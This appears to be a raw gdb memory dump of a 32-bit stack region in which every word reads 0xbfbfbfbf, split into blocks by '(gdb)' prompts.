0xbfffd960: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd970: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd980: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd990: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd9a0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd9b0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd9c0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd9d0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd9e0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd9f0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffda00: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffda10: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffda20: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffda30: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffda40: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffda50: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffda60: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffda70: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
(gdb) 
0xbfffda80: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffda90: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdaa0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdab0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdac0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdad0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdae0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdaf0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdb00: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdb10: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdb20: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdb30: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdb40: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdb50: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdb60: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdb70: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdb80: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdb90: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdba0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdbb0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdbc0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdbd0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdbe0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdbf0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdc00: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
(gdb) 
0xbfffdc10: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdc20: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdc30: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdc40: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdc50: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdc60: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdc70: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdc80: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdc90: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdca0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdcb0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdcc0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdcd0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdce0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdcf0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdd00: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdd10: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdd20: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdd30: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdd40: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdd50: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdd60: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdd70: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdd80: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdd90: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
(gdb) 
0xbfffdda0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffddb0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffddc0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffddd0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdde0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffddf0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffde00: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffde10: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffde20: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffde30: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffde40: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffde50: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffde60: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffde70: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffde80: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffde90: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdea0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdeb0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdec0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffded0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdee0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdef0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdf00: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdf10: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdf20: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
(gdb) 
0xbfffdf30: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdf40: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdf50: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdf60: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdf70: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdf80: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdf90: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdfa0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdfb0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdfc0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdfd0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdfe0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffdff0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe000: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe010: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe020: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe030: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe040: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe050: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe060: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe070: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe080: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe090: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe0a0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe0b0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
(gdb) 
0xbfffe0c0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe0d0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe0e0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe0f0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe100: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe110: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe120: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe130: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe140: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe150: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe160: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe170: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe180: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe190: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe1a0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe1b0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe1c0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe1d0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe1e0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe1f0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe200: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe210: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe220: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe230: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe240: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
(gdb) 
0xbfffe250: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe260: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe270: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe280: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe290: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe2a0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe2b0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe2c0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe2d0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe2e0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe2f0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe300: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe310: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe320: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe330: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe340: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe350: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe360: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe370: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe380: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe390: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe3a0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe3b0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe3c0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe3d0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
(gdb) 
0xbfffe3e0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe3f0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe400: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe410: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe420: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe430: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe440: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe450: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe460: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe470: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe480: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe490: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe4a0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe4b0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe4c0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe4d0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe4e0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe4f0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe500: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe510: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe520: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe530: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe540: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe550: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe560: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
(gdb) 
0xbfffe570: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe580: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe590: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe5a0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe5b0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe5c0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe5d0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe5e0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe5f0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe600: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe610: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe620: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe630: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe640: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe650: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe660: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe670: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe680: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe690: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe6a0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe6b0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe6c0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe6d0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe6e0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe6f0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
(gdb) 
0xbfffe700: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe710: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe720: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe730: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe740: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe750: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe760: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe770: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe780: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe790: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe7a0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe7b0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe7c0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe7d0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe7e0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe7f0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe800: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe810: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe820: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe830: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe840: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe850: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe860: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe870: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe880: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
(gdb) 
0xbfffe890: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe8a0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe8b0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe8c0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe8d0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe8e0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe8f0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe900: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe910: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe920: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe930: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe940: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe950: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe960: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe970: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe980: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe990: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe9a0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe9b0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe9c0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe9d0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe9e0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffe9f0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffea00: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffea10: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
(gdb) 
0xbfffea20: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffea30: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffea40: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffea50: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffea60: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffea70: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffea80: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffea90: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffeaa0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
